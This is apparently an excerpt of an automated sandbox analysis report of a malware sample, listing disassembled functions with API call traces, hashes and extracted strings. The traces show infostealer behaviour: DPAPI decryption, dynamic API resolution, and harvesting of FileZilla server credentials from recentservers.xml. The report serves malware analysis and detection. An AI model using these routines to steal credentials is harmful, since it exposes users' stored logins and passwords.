                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022D9DEB
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 022D9E0A
                                      • memcpy.MSVCRT(?,?,?), ref: 022D9E2D
                                      • LocalFree.KERNEL32(?), ref: 022D9E3A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction ID: d9f662d17a182aba864762757bef7205fdf38135c504fd4ba0f7128c44408f0a
                                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                      • Instruction Fuzzy Hash: 7D1109B8A00209EFDB04CFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006BF570,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,006BF570,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006BF570,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                      • wsprintfA.USER32 ref: 00417AB7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 362916592-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                      APIs
                                      • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                      • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                      • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .$GetProcAddress.$l
                                      • API String ID: 0-2784972518
                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction ID: 7a7252b41ec6c3a8c5e65a14dfc705917c9624575457a02fffa1364ef6503cdb
                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction Fuzzy Hash: 183139B6910609DFDB20CF99C880AEEBBF5FF48724F15404AD441A7264D7B1EA45CBA4
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                      • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                      • Instruction ID: 02e32bd03135c8904990f4c3068a6781f6d0d5d246d2c18365d8a2a58b6c29c3
                                      • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                      • Instruction Fuzzy Hash: 0E119D3182034CABCF28EBE0DD549ED7336AB60300F8042AAA50B56695EF342B48DF41
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022ED156
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_691000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction ID: fb5d81417e0918e32b3910fc217e5608d0c7b29e2025477dea8a698c7fcc641c
                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction Fuzzy Hash: DD113072380101AFDB54DF55DC91FA673EEEB89320B298055ED04CB715E675E842C760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction ID: b3384d38f6e074f45c5f91d2b811c2238e5bed16dec30f53c6b0da12868abc93
                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction Fuzzy Hash: 19012B726206008FDF21CFB0C804FAA33F9FB86305F1540B9E906D7296E370AA41CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction ID: 73b83034997c00ce190831bab7256bad9184d10151853065d219d92f9c26525e
                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                      • Instruction Fuzzy Hash: 5071C131471B80EBDF6B3BB1DD01F8E7AA3BF04702F904924B1DB295749E226865BE51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • strtok_s.MSVCRT ref: 0041031B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                      • lstrlenA.KERNEL32(00000000), ref: 00410393
                                        • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                        • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                      • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                      • lstrlenA.KERNEL32(00000000), ref: 00410427
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                      • lstrlenA.KERNEL32(00000000), ref: 00410475
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                      • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                      • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                      • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                      • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                      • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                      • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                      • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                      • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                      • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                      • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                      • strtok_s.MSVCRT ref: 00410679
                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                      • memset.MSVCRT ref: 004106DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 337689325-514892060
                                      • Opcode ID: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
                                      • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                      • Opcode Fuzzy Hash: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
                                      • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                      APIs
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                      • GetProcAddress.KERNEL32(0064A8B0,0i), ref: 022E9B39
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                      • GetProcAddress.KERNEL32(0064A8B0,xah), ref: 022E9B9A
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                      • GetProcAddress.KERNEL32(0064A8B0,`i), ref: 022E9BE3
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022E9C5D
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022E9C75
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022E9C8E
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022E9CA6
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022E9CBE
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022E9CD7
                                      • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022E9CEF
                                      • LoadLibraryA.KERNEL32(0064A550,?,022E6C67), ref: 022E9D01
                                      • LoadLibraryA.KERNEL32(0064A17C,?,022E6C67), ref: 022E9D12
                                      • LoadLibraryA.KERNEL32(0064A104,?,022E6C67), ref: 022E9D24
                                      • LoadLibraryA.KERNEL32(xi,?,022E6C67), ref: 022E9D36
                                      • LoadLibraryA.KERNEL32(0064A328,?,022E6C67), ref: 022E9D47
                                      • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022E9D69
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022E9D8A
                                      • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022E9DA2
                                      • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022E9DC4
                                      • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022E9DE5
                                      • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022E9E06
                                      • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022E9E1D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: 0i$`i$xi$xah
                                      • API String ID: 2238633743-2869923364
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 53cb10b912881480f6cc348d60ee232ac40a3c26526d25caf30921e261c55479
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 9CA14CBD5D0240BFE364EFE8ED88A963BFBF74E201704661AE605C3264D7399441DB12
                                      APIs
                                      • lstrlen.KERNEL32(00424DA0), ref: 022D4833
                                      • lstrlen.KERNEL32(00424E50), ref: 022D483E
                                      • lstrlen.KERNEL32(00424F18), ref: 022D4849
                                      • lstrlen.KERNEL32(00424FD0), ref: 022D4854
                                      • lstrlen.KERNEL32(00425078), ref: 022D485F
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 022D486E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022D4875
                                      • lstrlen.KERNEL32(00425120), ref: 022D4883
                                      • lstrlen.KERNEL32(004251C8), ref: 022D488E
                                      • lstrlen.KERNEL32(00425270), ref: 022D4899
                                      • lstrlen.KERNEL32(00425318), ref: 022D48A4
                                      • lstrlen.KERNEL32(004253C0), ref: 022D48AF
                                      • lstrlen.KERNEL32(00425468), ref: 022D48C3
                                      • lstrlen.KERNEL32(00425510), ref: 022D48CE
                                      • lstrlen.KERNEL32(004255B8), ref: 022D48D9
                                      • lstrlen.KERNEL32(00425660), ref: 022D48E4
                                      • lstrlen.KERNEL32(00425708), ref: 022D48EF
                                      • lstrlen.KERNEL32(004257B0), ref: 022D4918
                                      • lstrlen.KERNEL32(00425858), ref: 022D4923
                                      • lstrlen.KERNEL32(00425920), ref: 022D492E
                                      • lstrlen.KERNEL32(004259C8), ref: 022D4939
                                      • lstrlen.KERNEL32(00425A70), ref: 022D4944
                                      • strlen.MSVCRT ref: 022D4957
                                      • lstrlen.KERNEL32(00425B18), ref: 022D497F
                                      • lstrlen.KERNEL32(00425BC0), ref: 022D498A
                                      • lstrlen.KERNEL32(00425C68), ref: 022D4995
                                      • lstrlen.KERNEL32(00425D10), ref: 022D49A0
                                      • lstrlen.KERNEL32(00425DB8), ref: 022D49AB
                                      • lstrlen.KERNEL32(00425E60), ref: 022D49BB
                                      • lstrlen.KERNEL32(00425F08), ref: 022D49C6
                                      • lstrlen.KERNEL32(00425FB0), ref: 022D49D1
                                      • lstrlen.KERNEL32(00426058), ref: 022D49DC
                                      • lstrlen.KERNEL32(00426100), ref: 022D49E7
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022D4A03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID:
                                      • API String ID: 2127927946-0
                                      • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction ID: c92d7508e6709aee49e0be563c1c34b0bfca0015370bb95c55c0003eaa20f757
                                      • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction Fuzzy Hash: E241A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                        • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                        • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
